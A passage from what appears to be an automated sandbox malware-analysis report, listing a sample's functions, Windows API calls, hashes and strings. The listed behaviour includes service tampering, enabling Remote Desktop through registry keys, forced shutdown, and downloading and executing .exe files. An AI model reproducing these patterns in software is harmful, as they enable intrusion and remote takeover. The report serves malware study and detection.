                        • Opcode Fuzzy Hash: f3ea7c8cad08968c178794aac95c1238a31c3cf0671c12b7416fdc071fe8bd09
                        • Instruction Fuzzy Hash: 7411033134430567EB10CA68EC85BDB73DDEF847A0F004A3EBA259B1C5DB74A80983A2
                        Function 100FA53B Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,100FA084,EntryPoint), ref: 100FA580
                        • ExitProcess.KERNEL32(00000000), ref: 100FA8FB
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocExitProcessVirtual
                        • String ID:
                        • API String ID: 3766876677-0
                        • Opcode ID: 8afa5ba330df0b2aa6dd58156658dffd9705745c3786967e08f2451346f5a9ef
                        • Instruction ID: d85d0e2950d76e963b09a1462a9c7c5fa7f51f0287fa6addd22ca636ed16c3d7
                        • Opcode Fuzzy Hash: 8afa5ba330df0b2aa6dd58156658dffd9705745c3786967e08f2451346f5a9ef
                        • Instruction Fuzzy Hash: 6BF068B4A403199FDB618F51CD04BDA76F5EF46751F1040E5E20AAA5C1C6749DC4CF14
                        Function 00403204 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                        Download Yara Rule
                        APIs
                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00401D80,00000000), ref: 00403215
                          • Part of subcall function 004030BC: GetVersionExA.KERNEL32 ref: 004030DB
                        • HeapDestroy.KERNEL32 ref: 00403254
                          • Part of subcall function 00401E60: HeapAlloc.KERNEL32(00000000,00000140,0040323D,000003F8), ref: 00401E6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Heap$AllocCreateDestroyVersion
                        • String ID:
                        • API String ID: 2507506473-0
                        • Opcode ID: e9afad21659b56b5dceae9258b24d2c3a29fe41c149464d9864e6bb69450587e
                        • Instruction ID: 42fef804957d99b8046de3e47bc02e017981682f25ff00ddb09ec9da6b7cfcf1
                        • Opcode Fuzzy Hash: e9afad21659b56b5dceae9258b24d2c3a29fe41c149464d9864e6bb69450587e
                        • Instruction Fuzzy Hash: 21F06570B84301A9EF206F719D0672A3A999B457C7F6044BFF501E41E1EAB886C1951E
                        Function 1000E09B Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCloseKey.ADVAPI32(?,1000E087,75BF8400,74DE8A60,00000000,?,00000000,00000001,?), ref: 1000E0A5
                        • RegCloseKey.ADVAPI32(?), ref: 1000E0AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 47598eded3da91d5f70afc388f7827ff66921f8ef6989313d7daf638d8460a8d
                        • Instruction ID: 7f96ad4505c945ad2564efcb6c63c867aea1d4645d5477836e77686e242ac1fa
                        • Opcode Fuzzy Hash: 47598eded3da91d5f70afc388f7827ff66921f8ef6989313d7daf638d8460a8d
                        • Instruction Fuzzy Hash: 87B09B76D141285BDB04DB54EC9089D37B56B8C3007114545F50463114C570BD418FD0
                        Function 020805AA Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02080626
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02080659
                        Memory Dump Source
                        • Source File: 00000000.00000003.1636444427.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_2080000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                        • Instruction ID: aa3241cda9c8e4676f196d0a2d42fd774d46e314892661caf2aad4a685c94b1e
                        • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                        • Instruction Fuzzy Hash: 58212735A00719BFEB009FA4CC40BEFFFF6EB54394F608162E960A2280E7704A15AB50
                        Function 0040111D Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(0040166A,?,00001000,00000004,00000000,0040166A,E9C11475,00000000,0040166A), ref: 00401173
                        • VirtualAlloc.KERNEL32(0040166A,?,00001000,00000004,00000000,0040166A,E9C11475,00000000,0040166A), ref: 00401194
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: dfdadb9c289b16297f2e3450dbef517fc2aa0ead9970782d7656506af1448c7a
                        • Instruction ID: 61b5e1ab705a6306bd85da6417c919c5fd8e00912e854bad08aecafb63dd7c7e
                        • Opcode Fuzzy Hash: dfdadb9c289b16297f2e3450dbef517fc2aa0ead9970782d7656506af1448c7a
                        • Instruction Fuzzy Hash: E3211875900204AFDB14DF59DC85F6AB7F8EF08308F15846AFA45AB3A1D274A950CB54
                        Function 100012A0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • 6E341E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: E341
                        • String ID:
                        • API String ID: 1096277783-0
                        • Opcode ID: f6572bc4487a722fe6d1b6d6740ca725a42ea13cb1323bd39af0fde5130c43a2
                        • Instruction ID: dfab7e9cb9d67053d8b78be9017eaf40c3d2ae30cfc283ddc5b6af0d1ea4ae48
                        • Opcode Fuzzy Hash: f6572bc4487a722fe6d1b6d6740ca725a42ea13cb1323bd39af0fde5130c43a2
                        • Instruction Fuzzy Hash: 0DD05B3194122076F651D524AD42FDF739CAF53B84F814138FE41D6086E9195B6E53E2
                        Function 10015FD0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: calloc
                        • String ID:
                        • API String ID: 2635317215-0
                        • Opcode ID: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                        • Instruction ID: 57ee39a5c2179efdcf9e74748dfd00d757473c01ee89f97a1dd27ae360f7bfc3
                        • Opcode Fuzzy Hash: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                        • Instruction Fuzzy Hash: 1CB012FD5042007FCA04D750EC81CABB39DEBC4101F80890CBC4982200D635E808C722
                        Function 10015FF0 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: 0f0d6fdb1ac86cc29fbc76b34d5d46b4d50178db8573c46d70ca9f7408e4f779
                        • Instruction ID: ad1a8a2527788e51c4240fc1b33061a3e194ab0d35e4563098d5290263de1f09
                        • Opcode Fuzzy Hash: 0f0d6fdb1ac86cc29fbc76b34d5d46b4d50178db8573c46d70ca9f7408e4f779
                        • Instruction Fuzzy Hash: 53A022BA800200228800C2E8C0008CA23CC8A80000B200808B00282800CA30F0800302

                        Non-executed Functions

                        Function 100108F0 Relevance: 79.2, APIs: 42, Strings: 3, Instructions: 406stringmemoryserviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 100109A1
                        • OutputDebugStringA.KERNEL32(OpenSCManager Error), ref: 100109B6
                        • LocalAlloc.KERNEL32(00000040,00010000), ref: 100109C9
                        • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,00010000,?,?,?), ref: 100109E7
                        • LocalAlloc.KERNEL32(00000040,00000104), ref: 100109F4
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010A3F
                        • LocalAlloc.KERNEL32(00000040,00001000), ref: 10010A52
                        • QueryServiceConfigA.ADVAPI32(00000000,00000000,00001000,?), ref: 10010A66
                        • lstrcat.KERNEL32(00000000,1007B97C), ref: 10010AAB
                        • lstrcat.KERNEL32(?,1007B974), ref: 10010ACE
                        • lstrcat.KERNEL32(?,1007B96C), ref: 10010AF1
                        • lstrcat.KERNEL32(?,1007B964), ref: 10010B14
                        • wsprintfA.USER32 ref: 10010B31
                        • wsprintfA.USER32 ref: 10010B5F
                          • Part of subcall function 1000E6B0: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,10010B75,00000000,10010B75,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E6C8
                          • Part of subcall function 1000E7C0: RegQueryValueExA.ADVAPI32(?,10010B8B,00000000,10010B8B,?), ref: 1000E7E3
                        • wsprintfA.USER32 ref: 10010BA0
                        • lstrlen.KERNEL32(?), ref: 10010BA9
                        • lstrlen.KERNEL32(?), ref: 10010BB5
                        • lstrlen.KERNEL32(?), ref: 10010BC1
                        • lstrlen.KERNEL32(?), ref: 10010BCA
                        • lstrlen.KERNEL32(?), ref: 10010BD6
                        • lstrlen.KERNEL32 ref: 10010BDD
                        • lstrlen.KERNEL32(?), ref: 10010BE5
                        • LocalSize.KERNEL32(?), ref: 10010BF7
                        • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10010C05
                        • lstrlen.KERNEL32(?), ref: 10010C13
                        • lstrlen.KERNEL32(?), ref: 10010C38
                        • lstrlen.KERNEL32(00000000), ref: 10010C49
                        • lstrlen.KERNEL32(00000001), ref: 10010C67
                        • lstrlen.KERNEL32(?), ref: 10010C7D
                        • lstrlen.KERNEL32(?), ref: 10010C9E
                        • lstrlen.KERNEL32(?), ref: 10010CB4
                        • lstrlen.KERNEL32(?), ref: 10010CDC
                        • lstrlen.KERNEL32(?), ref: 10010CEF
                        • lstrlen.KERNEL32(?), ref: 10010D11
                        • lstrlen.KERNEL32(?), ref: 10010D27
                        • lstrlen.KERNEL32(?), ref: 10010D4F
                        • lstrlen.KERNEL32(?), ref: 10010D65
                        • lstrlen.KERNEL32(?), ref: 10010D8D
                        • CloseServiceHandle.ADVAPI32(?), ref: 10010DA0
                        • LocalFree.KERNEL32(?), ref: 10010DAB
                          • Part of subcall function 1000E650: RegCloseKey.ADVAPI32(?,?,10010DC5), ref: 1000E6FB
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10010DE6
                        • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10010DF4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Local$Alloc$Servicelstrcat$CloseOpenwsprintf$HandleQuery$ConfigDebugEnumFreeManagerOutputServicesSizeStatusStringValue
                        • String ID: Description$OpenSCManager Error$SYSTEM\CurrentControlSet\Services\%s
                        • API String ID: 1351573288-819907790
                        • Opcode ID: eb8acb3cd48b3b8705e3e55d8ac69ee01bbcd980edd4b4a107577e840ee66f5c
                        • Instruction ID: e7c26887a4a755f3e800bf02e90654323b7054d5da9e1bca9845896b7bd25439
                        • Opcode Fuzzy Hash: eb8acb3cd48b3b8705e3e55d8ac69ee01bbcd980edd4b4a107577e840ee66f5c
                        • Instruction Fuzzy Hash: C7E16E722083859FD724CF24CC94AABB7E6FBC8704F40491DF68A97240DB75E949CB96
                        Function 10010E20 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 250servicesleepregistryCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E82
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E97
                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10010EB9
                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010EDA
                        • Sleep.KERNEL32(00000320), ref: 10010EED
                        • DeleteService.ADVAPI32(00000000), ref: 10010EF4
                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 10010F5B
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010FAC
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010FC3
                        • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010FD8
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10010FDF
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010FF1
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10011008
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 10011019
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 1001103E
                        • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10011055
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 10011066
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 1001108B
                        • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 100110A2
                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 100110B8
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 100110BF
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 100110CE
                        • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 100110E1
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 100110EE
                        • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001110B
                        • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10011112
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10011119
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10011120
                        • Sleep.KERNEL32(000001F4), ref: 1001112B
                        Strings
                        • SYSTEM\CurrentControlSet\Services\, xrefs: 10010F00
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$Open$Manager$CloseDatabaseHandle$Lock$ControlDeleteSleep$ChangeConfigQueryStartStatusUnlock
                        • String ID: SYSTEM\CurrentControlSet\Services\
                        • API String ID: 1632965242-3886778518
                        • Opcode ID: e366eb30fde5a9740f4aac1adcd538e22698b2822aec59608f0c7914ff6243b9
                        • Instruction ID: cc42ca167b79540896cba8f502ec8c32fc53dbd823b7856c78d30bca86a94536
                        • Opcode Fuzzy Hash: e366eb30fde5a9740f4aac1adcd538e22698b2822aec59608f0c7914ff6243b9
                        • Instruction Fuzzy Hash: 33712F31A40765BBF3218B648C89FAE76B5EB49B51F100258FF15AB2D0DFF48CC58A61
                        Function 1000B280 Relevance: 42.1, APIs: 4, Strings: 20, Instructions: 103shutdownCOMMON
                        Download Yara Rule
                        APIs
                        • _strrev.MSVCRT ref: 1000B2E0
                        • _strrev.MSVCRT ref: 1000B2FF
                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,PortNumber), ref: 1000B3DA
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • ExitWindowsEx.USER32(00000002,00000000), ref: 1000B406
                          • Part of subcall function 10012110: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10012157
                          • Part of subcall function 10012110: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
                          • Part of subcall function 10012110: GetLastError.KERNEL32 ref: 10012175
                          • Part of subcall function 10012110: CloseHandle.KERNEL32(?), ref: 10012186
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken_strrev$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueVersionWindows
                        • String ID: .DEFAULT\Keyboard Layout\Toggle$EnableAdminTSRemote$Enabled$Hotkey$PortNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\netcache$SOFTWARE\Policies\Microsoft\Windows\Installer$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermDD$SYSTEM\CurrentControlSet\Services\TermService$SeShutdownPrivilege$ShutdownWithoutLogon$Start$delbanEST$fDenyTSConnections$tratS
                        • API String ID: 2558968919-3505973513
                        • Opcode ID: 6502fbce9b3ead229023f297d8fd25cdf45d4d59d3e2ae8f66ce30c198aef70f
                        • Instruction ID: 03a8e942730589f9d90613ddbbc229d4fa2b89ed1c477dbbb88bf709103cdcb1
                        • Opcode Fuzzy Hash: 6502fbce9b3ead229023f297d8fd25cdf45d4d59d3e2ae8f66ce30c198aef70f
                        • Instruction Fuzzy Hash: E2318E74980E19B6F110E7A06C4FFFF6949DB54784F14C418BB8879187EB697260816F
                        Function 1000B880 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 137filesleepnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(000007D0), ref: 1000B88F
                        • GetTickCount.KERNEL32 ref: 1000B8E3
                        • wsprintfA.USER32 ref: 1000B8F8
                        • URLDownloadToFileA.URLMON(00000000,?,C:\,00000000,00000000), ref: 1000B910
                        • GetTempPathA.KERNEL32(00000104,?,00000000,?,C:\,00000000,00000000), ref: 1000B924
                        • fopen.MSVCRT ref: 1000B934
                        • fscanf.MSVCRT ref: 1000B95B
                        • GetTickCount.KERNEL32 ref: 1000B969
                        • wsprintfA.USER32 ref: 1000B981
                        • GetTickCount.KERNEL32 ref: 1000B986
                        • wsprintfA.USER32 ref: 1000B99E
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000B9B9
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000B9D3
                        • fscanf.MSVCRT ref: 1000B9E7
                        • fclose.MSVCRT ref: 1000B9F6
                        • DeleteFileA.KERNEL32(C:\), ref: 1000BA04
                        • Sleep.KERNEL32(?), ref: 1000BA4A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountFileTickwsprintf$DownloadSleepfscanf$DeleteExecutePathShellTempfclosefopen
                        • String ID: %s$%s%d.exe$%s?abc=%d$C:\$open
                        • API String ID: 2342319182-3740277425
                        • Opcode ID: b42e55211549e6f07530de7ef7b63ea4ec71caa64ffdb6ad385f06bdb66e5b16
                        • Instruction ID: cf1a9db28ea3f02fa858ca486d8cc8962c6677559f9c92e405e34d3f1aa9c5a2
                        • Opcode Fuzzy Hash: b42e55211549e6f07530de7ef7b63ea4ec71caa64ffdb6ad385f06bdb66e5b16
                        • Instruction Fuzzy Hash: 6E41E271108791ABF334DB60CC85FEB779DEF85700F004918FB8996181EBB5AA48C7A6
                        Function 10007200 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 10007240
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
